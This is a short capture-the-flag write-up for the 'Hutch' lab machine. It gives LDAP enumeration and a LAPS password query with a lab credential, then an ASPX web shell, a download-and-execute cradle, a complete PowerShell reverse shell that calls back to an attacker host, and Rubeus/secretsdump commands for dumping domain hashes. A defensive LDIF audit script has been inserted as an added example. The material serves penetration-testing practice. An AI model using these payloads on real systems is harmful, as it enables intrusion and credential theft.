LDAP, WebDAV, LAPS & Unintended Solutions - Hutch @ PG Practice

We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP and use them to upload a web shell via WebDAV. For root, we will read a LAPS password (the intended way) and then explore other methods.

Notes

LDAP

# list all attributes
ldapsearch -x -b "dc=hutch,dc=offsec" "*" -h hutch.pg

# query LAPS password
ldapsearch -D fmcsorley@HUTCH.OFFSEC -w CrabSharkJellyfish192 -o ldif-wrap=no -b 'dc=hutch,dc=offsec' -h hutch.pg "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd
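
A defender-side check for the two queries above, as an added example that is not part of the original post: save the `ldapsearch` output obtained with an anonymous or low-privileged bind and pass it to `audit()` to list which entries expose `ms-Mcs-AdmPwd` or password hints in free-text fields, without echoing the values. The free-text attribute list, the keyword pattern, the function names and the sample LDIF are assumptions constructed for illustration.

```python
import base64
import re

# Attributes a low-privileged or anonymous bind should never be able to read.
SECRET_ATTRS = {"ms-mcs-admpwd", "userpassword", "unicodepwd"}
# Assumption: free-text fields where credentials are sometimes left behind.
FREE_TEXT = {"description", "info", "comment"}
HINT = re.compile(r"passw|pwd", re.I)

# Constructed sample output; DNs and values are made up.
SAMPLE = """\
dn: CN=WS01,OU=Workstations,DC=example,DC=test
description: Lab workstation
ms-Mcs-AdmPwd: CONSTRUCTED-VALUE

dn: CN=Temp User,CN=Users,DC=example,DC=test
description:: UGFzc3dvcmQgc2V0IHRvIFBMQUNFSE9MREVS

search: 2
"""

def parse_ldif(text):
    """Parse unwrapped LDIF (-o ldif-wrap=no) into (dn, {attr: [values]}) pairs."""
    entries, dn, attrs = [], None, {}
    for line in text.splitlines() + [""]:
        if not line.strip():                  # blank line closes the current entry
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, {}
        elif not line.startswith("#") and ":" in line:
            name, _, rest = line.partition(":")
            value = rest.strip()
            if rest.startswith(":"):          # "attr:: <base64>" form
                value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
            if name.lower() == "dn":
                dn = value
            elif dn is not None:              # skips trailer lines such as "search: 2"
                attrs.setdefault(name.lower(), []).append(value)
    return entries

def audit(text):
    """Return (dn, attribute, reason) findings; attribute values are never echoed."""
    findings = []
    for dn, attrs in parse_ldif(text):
        for name, values in attrs.items():
            if name in SECRET_ATTRS:
                findings.append((dn, name, "secret attribute readable by this bind"))
            elif name in FREE_TEXT and any(HINT.search(v) for v in values):
                findings.append((dn, name, "free-text field mentions a password"))
    return findings
```

An empty result from `audit()` for a given bind means that account could not read any of the listed attributes in the captured output.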

ASPX Runner

iex(iwr http://ip/run.txt -usebasicparsing)

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">

void Page_Load(object sender, EventArgs e){
 ProcessStartInfo si = new ProcessStartInfo();
 si.FileName = "powershell.exe";
 si.Arguments = "-enc ...";
 Process p = Process.Start(si);
 p.WaitForExit();
}
</script>

Run.txt

$client = New-Object System.Net.Sockets.TCPClient("ip",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ">_ ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Rubeus TGTDeleg

iwr http://ip/Rubeus.exe -outfile Rubeus.exe
.\Rubeus.exe tgtdeleg /nowrap
# copy ticket over & base64 decode, then:
python3 /opt/impacket/examples/ticketConverter.py m.kirbi m.ccache
export KRB5CCNAME=`pwd`/m.ccache
sudo ntpdate -u hutch.pg
python3 /opt/impacket/examples/secretsdump.py HUTCH.OFFSEC/HUTCHDC\$@hutchdc.hutch.offsec -dc-ip hutch.offsec -no-pass -k

This post is licensed under CC BY 4.0 by the author.